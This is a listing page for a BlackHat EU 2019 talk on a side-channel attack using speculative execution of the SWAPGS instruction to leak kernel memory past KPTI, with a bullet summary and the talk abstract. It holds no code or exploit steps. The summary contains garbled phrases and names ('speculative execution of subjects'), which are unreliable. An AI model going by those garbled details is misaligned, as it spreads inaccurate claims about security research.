Bypassing KPTI Using the Speculative Behavior of the SWAPGS Instruction

Conference:  BlackHat EU 2019



The presentation discusses the Spectre vulnerability and a new variant that exploits speculative execution of subjects. The speaker explains the research process and potential mitigations.
  • The starting point for the research was the work of Google and Daniel GrusinBusiek University in Amsterdam on speculative execution of subjects
  • The new Spectre variant treats values as addresses to leak information
  • The vulnerability is x86 specific and may not affect ARM processors
  • Mitigations include serializing branches, clobbering user mode GS, and instrumenting the kernel
  • The performance vs. security tradeoff is a challenge for fixing the vulnerability
The speaker explains that the research process was not a moment of eureka, but rather a continuous process of building the attack from scratch. They started by looking at different things that they thought no one had looked at before, and eventually discovered the vulnerability by seeing that subjects can be executed speculatively.


Speculative-execution based attacks and side-channels are more and more common as disclosures continue to increase scrutiny by researchers in this field. In this talk, we demonstrate a new type of side-channel attack based on speculative execution of the SWAPGS instruction inside the OS kernel. This attack is capable of circumventing all existing protective measures, such as CPU microcode patches or kernel address space isolation (KVA shadowing/KPTI). We practically demonstrate this by showing how the speculative execution of the SWAPGS instruction may allow an attacker to leak portions of the kernel memory, by employing a variant of Spectre V1. During the talk, we will also detail some other minor discoveries related to speculative execution, mainly how some segment registers are handled.